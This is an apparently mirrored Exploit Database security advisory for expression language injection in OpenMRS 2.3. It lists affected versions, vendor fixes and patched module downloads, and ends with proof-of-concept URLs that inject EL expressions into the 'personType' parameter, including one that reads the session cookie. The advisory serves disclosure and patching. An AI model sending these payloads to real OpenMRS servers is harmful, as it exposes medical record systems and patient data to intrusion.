OpenMRS 2.3 (1.11.4) – Expression Language Injection

• Exploit Database
• 17 阅读

• 作者： LiquidWorm
  日期： 2015-12-08
• 类别：

  • webapps
  平台：

  • xml
• 来源：https://www.exploit-db.com/exploits/38897/

• OpenMRS 2.3 (1.11.4) Expression Language Injection Vulnerability
  
  
  Vendor: OpenMRS Inc.
  Product web page: http://www.openmrs.org
  Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
  OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))
  
  Summary: OpenMRS is an application which enables design
  of a customized medical records system with no programming
  knowledge (although medical and systems analysis knowledge
  is required). It is a common framework upon which medical
  informatics efforts in developing countries can be built.
  
  Desc: Input passed via the 'personType' parameter is not
  properly sanitised in the spring's expression language
  support via 'addPerson.htm' script before being used. This
  can be exploited to inject expression language (EL) and
  subsequently execute arbitrary Java code.
  
  
  Tested on: Ubuntu 12.04.5 LTS
   Apache Tomcat/7.0.26
   Apache Tomcat/6.0.36
   Apache Coyote/1.1
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2015-5288
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5288.php
  
  Affected: OpenMRS Core, Serialization.Xstream module, Metadata Sharing module
  Severity: Major
  Exploit: Remote Code Execution by an authenticated user
  
  Vendor Bug Fixes:
  
  Disabled serialization and deserialization of dynamic proxies
  Disabled deserialization of external entities in XML files
  Disabled spring's Expression Language support
  
  https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868
  https://talk.openmrs.org/t/critical-security-advisory-2015-11-25/3824
  https://wiki.openmrs.org/display/RES/Release+Notes+2.3.1
  http://openmrs.org/2015/12/reference-application-2-3-1-released/
  https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.9.10
  https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.10.3
  https://wiki.openmrs.org/display/RES/Platform+Release+Notes+1.11.5
  https://modules.openmrs.org/modulus/api/releases/1308/download/serialization.xstream-0.2.10.omod
  https://modules.openmrs.org/modulus/api/releases/1309/download/metadatasharing-1.1.10.omod
  https://modules.openmrs.org/modulus/api/releases/1303/download/reporting-0.9.8.1.omod
  
  OpenMRS platform has been upgraded to version 1.11.5
  Reporting module has been upgraded to version 0.9.8.1
  Metadata sharing module has been upgraded to version 1.1.10
  Serialization.xstream module has been upgraded to version 0.2.10
  
  Who is affected?
  
  Anyone running OpenMRS Platform (1.9.0 and later)
  Anyone running OpenMRS Reference Application 2.0, 2.1, 2.2, 2.3
  Anyone that has installed the serialization.xstream module except for the newly released 0.2.10 version.
  Anyone that has installed the metadatasharing module except for the newly released 1.1.10 version.
  
  
  02.11.2015
  
  --
  
  
  http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${3*3}&viewType=
  http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${applicationScope}&viewType=
  http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=%3Ci%3E${username}&viewType=
  http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${cookie[%22JSESSIONID%22].value}
  http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm?personType=${Condition?%22Ok%22:3%3C2}